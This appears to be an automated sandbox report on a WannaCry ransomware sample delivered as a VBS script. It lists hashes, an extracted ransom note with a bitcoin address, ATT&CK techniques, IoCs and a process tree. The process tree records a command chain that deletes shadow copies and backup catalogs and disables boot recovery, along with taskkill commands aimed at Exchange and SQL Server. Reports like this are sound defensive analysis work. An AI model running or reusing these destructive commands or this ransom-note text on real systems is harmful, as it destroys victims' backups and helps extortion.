wannacry | 89dc1ad33387208aee70ad03d10221404bc25df1b76f93a9e414a4dde51d7d35

Analysis

max time kernel
150s
max time network
151s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
27-09-2024 20:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

magic trick.vbs
Size

10KB
MD5

5c9037a08cd415dee04498a9204bf64c
SHA1

c73a3d761ec0faa64beed4ed5379d7b43e7b875b
SHA256

89dc1ad33387208aee70ad03d10221404bc25df1b76f93a9e414a4dde51d7d35
SHA512

855e3a2c9a025dbf9ee0f5310786f5f7c85d3169c1b2a126cecd1693c388b11f78365b76e488dc4b382a5190e2d9180b967da8b47a98b30d5c69dc280bbb16d1
SSDEEP

192:Uw555Ks8TiWkjJ1MMuMkMkMDMOMmM3MOMEMXM20MmhMBPZQHYmCIGQ8KATslEjle:D5z4iWkjJKVXHCLtQLD4h0VKBPOfdGQT

Score

10^/10

wannacry defense_evasion discovery execution impact persistence ransomware spyware stealer worm

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\!Please Read Me!.txt

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1 Next, please find the decrypt software on your desktop, an executable file named "!WannaDecryptor!.exe". If it does not exsit, download the software from the address below. (You may need to disable your antivirus for a while.) rar password: wcry123 Run and follow the instructions! �

Wallets

15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Downloads MZ/PE file

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDA371.tmp	WannaCry.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDA388.tmp	WannaCry.exe

Executes dropped EXE 5 IoCs

pid	Process
4580	WannaCry.exe
4988	!WannaDecryptor!.exe
4176	!WannaDecryptor!.exe
4804	!WannaDecryptor!.exe
1372	!WannaDecryptor!.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Update Task Scheduler = "\"C:\\Users\\Admin\\Downloads\\WannaCry.exe\" /r"	WannaCry.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
20	raw.githubusercontent.com
66	raw.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\!WannaCryptor!.bmp"	!WannaDecryptor!.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\SystemTemp	setup.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\metadata	setup.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\settings.dat	setup.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\WannaCry.exe:Zone.Identifier	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WannaCry.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	!WannaDecryptor!.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	!WannaDecryptor!.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	!WannaDecryptor!.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	!WannaDecryptor!.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
1472	taskkill.exe
2272	taskkill.exe
3940	taskkill.exe
3880	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133719429002552939"	chrome.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\WannaCry.exe:Zone.Identifier	chrome.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
3800	chrome.exe
3800	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe
1852	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
4580	WannaCry.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe
Token: SeShutdownPrivilege	3800	chrome.exe
Token: SeCreatePagefilePrivilege	3800	chrome.exe

Suspicious use of FindShellTrayWindow 37 IoCs

pid	Process
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
4988	!WannaDecryptor!.exe
4988	!WannaDecryptor!.exe
4176	!WannaDecryptor!.exe
4176	!WannaDecryptor!.exe
4804	!WannaDecryptor!.exe
4804	!WannaDecryptor!.exe
1372	!WannaDecryptor!.exe
1372	!WannaDecryptor!.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3800 wrote to memory of 4944	3800	chrome.exe	81
PID 3800 wrote to memory of 4944	3800	chrome.exe	81
PID 3800 wrote to memory of 3620	3800	chrome.exe	82
PID 3800 wrote to memory of 3620	3800	chrome.exe	82
PID 3800 wrote to memory of 3620	3800	chrome.exe	82
PID 3800 wrote to memory of 3620	3800	chrome.exe	82
PID 3800 wrote to memory of 3620	3800	chrome.exe	82
PID 3800 wrote to memory of 3620	3800	chrome.exe	82
PID 3800 wrote to memory of 3620	3800	chrome.exe	82
PID 3800 wrote to memory of 3620	3800	chrome.exe	82
PID 3800 wrote to memory of 3620	3800	chrome.exe	82
PID 3800 wrote to memory of 3620	3800	chrome.exe	82
PID 3800 wrote to memory of 3620	3800	chrome.exe	82
PID 3800 wrote to memory of 3620	3800	chrome.exe	82
PID 3800 wrote to memory of 3620	3800	chrome.exe	82
PID 3800 wrote to memory of 3620	3800	chrome.exe	82
PID 3800 wrote to memory of 3620	3800	chrome.exe	82
PID 3800 wrote to memory of 3620	3800	chrome.exe	82
PID 3800 wrote to memory of 3620	3800	chrome.exe	82
PID 3800 wrote to memory of 3620	3800	chrome.exe	82
PID 3800 wrote to memory of 3620	3800	chrome.exe	82
PID 3800 wrote to memory of 3620	3800	chrome.exe	82
PID 3800 wrote to memory of 3620	3800	chrome.exe	82
PID 3800 wrote to memory of 3620	3800	chrome.exe	82
PID 3800 wrote to memory of 3620	3800	chrome.exe	82
PID 3800 wrote to memory of 3620	3800	chrome.exe	82
PID 3800 wrote to memory of 3620	3800	chrome.exe	82
PID 3800 wrote to memory of 3620	3800	chrome.exe	82
PID 3800 wrote to memory of 3620	3800	chrome.exe	82
PID 3800 wrote to memory of 3620	3800	chrome.exe	82
PID 3800 wrote to memory of 3620	3800	chrome.exe	82
PID 3800 wrote to memory of 3620	3800	chrome.exe	82
PID 3800 wrote to memory of 4440	3800	chrome.exe	83
PID 3800 wrote to memory of 4440	3800	chrome.exe	83
PID 3800 wrote to memory of 2660	3800	chrome.exe	84
PID 3800 wrote to memory of 2660	3800	chrome.exe	84
PID 3800 wrote to memory of 2660	3800	chrome.exe	84
PID 3800 wrote to memory of 2660	3800	chrome.exe	84
PID 3800 wrote to memory of 2660	3800	chrome.exe	84
PID 3800 wrote to memory of 2660	3800	chrome.exe	84
PID 3800 wrote to memory of 2660	3800	chrome.exe	84
PID 3800 wrote to memory of 2660	3800	chrome.exe	84
PID 3800 wrote to memory of 2660	3800	chrome.exe	84
PID 3800 wrote to memory of 2660	3800	chrome.exe	84
PID 3800 wrote to memory of 2660	3800	chrome.exe	84
PID 3800 wrote to memory of 2660	3800	chrome.exe	84
PID 3800 wrote to memory of 2660	3800	chrome.exe	84
PID 3800 wrote to memory of 2660	3800	chrome.exe	84
PID 3800 wrote to memory of 2660	3800	chrome.exe	84
PID 3800 wrote to memory of 2660	3800	chrome.exe	84
PID 3800 wrote to memory of 2660	3800	chrome.exe	84
PID 3800 wrote to memory of 2660	3800	chrome.exe	84
PID 3800 wrote to memory of 2660	3800	chrome.exe	84
PID 3800 wrote to memory of 2660	3800	chrome.exe	84
PID 3800 wrote to memory of 2660	3800	chrome.exe	84
PID 3800 wrote to memory of 2660	3800	chrome.exe	84
PID 3800 wrote to memory of 2660	3800	chrome.exe	84
PID 3800 wrote to memory of 2660	3800	chrome.exe	84
PID 3800 wrote to memory of 2660	3800	chrome.exe	84
PID 3800 wrote to memory of 2660	3800	chrome.exe	84
PID 3800 wrote to memory of 2660	3800	chrome.exe	84
PID 3800 wrote to memory of 2660	3800	chrome.exe	84
PID 3800 wrote to memory of 2660	3800	chrome.exe	84
PID 3800 wrote to memory of 2660	3800	chrome.exe	84

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\magic trick.vbs"
1⤵
PID:3908

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffff2e0cc40,0x7ffff2e0cc4c,0x7ffff2e0cc58
  2⤵
  PID:4944
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1892,i,4469143170735003977,6739462727402697991,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1888 /prefetch:2
  2⤵
  PID:3620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1728,i,4469143170735003977,6739462727402697991,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2020 /prefetch:3
  2⤵
  PID:4440
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2172,i,4469143170735003977,6739462727402697991,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1984 /prefetch:8
  2⤵
  PID:2660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3068,i,4469143170735003977,6739462727402697991,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3192 /prefetch:1
  2⤵
  PID:860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3120,i,4469143170735003977,6739462727402697991,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3280 /prefetch:1
  2⤵
  PID:4024
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4420,i,4469143170735003977,6739462727402697991,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4448 /prefetch:8
  2⤵
  PID:4568
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3560,i,4469143170735003977,6739462727402697991,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4588 /prefetch:1
  2⤵
  PID:3836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3740,i,4469143170735003977,6739462727402697991,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3520 /prefetch:8
  2⤵
  PID:2472
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4844,i,4469143170735003977,6739462727402697991,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4860 /prefetch:8
  2⤵
  PID:2364
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4856,i,4469143170735003977,6739462727402697991,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4764 /prefetch:8
  2⤵
  PID:3732
- C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --reenable-autoupdates --system-level
  2⤵
  - Drops file in Windows directory
  PID:4288
- - C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x7ff7363b4698,0x7ff7363b46a4,0x7ff7363b46b0
    3⤵
    - Drops file in Windows directory
    PID:2268
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4808,i,4469143170735003977,6739462727402697991,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3520 /prefetch:1
  2⤵
  PID:4260
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=3284,i,4469143170735003977,6739462727402697991,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4328 /prefetch:1
  2⤵
  PID:2472
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5228,i,4469143170735003977,6739462727402697991,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5236 /prefetch:8
  2⤵
  PID:5060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5384,i,4469143170735003977,6739462727402697991,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5380 /prefetch:8
  2⤵
  PID:4528
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5200,i,4469143170735003977,6739462727402697991,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5256 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  PID:1128
- C:\Users\Admin\Downloads\WannaCry.exe
  "C:\Users\Admin\Downloads\WannaCry.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: RenamesItself
  PID:4580
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 54781727469347.bat
    3⤵
    - System Location Discovery: System Language Discovery
    PID:380
  - - C:\Windows\SysWOW64\cscript.exe
      cscript //nologo c.vbs
      4⤵
      System Location Discovery: System Language Discovery
      PID:3316
- - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
    !WannaDecryptor!.exe f
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:4988
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im MSExchange*
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    PID:1472
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im Microsoft.Exchange.*
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    PID:2272
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sqlserver.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    PID:3880
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sqlwriter.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    PID:3940
- - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
    !WannaDecryptor!.exe c
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:4176
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c start /b !WannaDecryptor!.exe v
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4728
  - - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
      !WannaDecryptor!.exe v
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:4804
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5016
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1516
- - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
    !WannaDecryptor!.exe
    3⤵
    - Executes dropped EXE
    - Sets desktop wallpaper using registry
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:1372
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=3392,i,4469143170735003977,6739462727402697991,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3368 /prefetch:1
  2⤵
  PID:4892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5720,i,4469143170735003977,6739462727402697991,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5736 /prefetch:1
  2⤵
  PID:2212
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5588,i,4469143170735003977,6739462727402697991,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5948 /prefetch:8
  2⤵
  PID:1100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5956,i,4469143170735003977,6739462727402697991,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5972 /prefetch:8
  2⤵
  PID:3932
- C:\Program Files\Google\Chrome\Application\chrome.exe
